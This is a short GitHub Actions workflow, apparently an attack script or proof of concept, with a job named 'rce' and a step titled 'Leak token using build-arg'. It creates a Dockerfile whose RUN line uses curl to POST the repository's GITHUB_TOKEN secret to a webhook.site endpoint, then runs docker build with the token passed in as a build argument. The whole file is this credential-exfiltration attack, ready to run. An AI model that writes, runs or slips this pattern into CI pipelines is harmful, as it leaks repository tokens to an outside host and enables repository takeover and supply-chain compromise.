jobs:
  rce:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

    steps:
      - name: Leak token using build-arg
        run: |
          echo 'ARG GITHUB_TOKEN' > Dockerfile
          echo 'RUN curl -X POST https://webhook.site/529200f3-872d-4083-bf2d-b5c014761b69 -d "token=$GITHUB_TOKEN"' >> Dockerfile
          docker build --build-arg GITHUB_TOKEN=${GITHUB_TOKEN} -t rce-image .
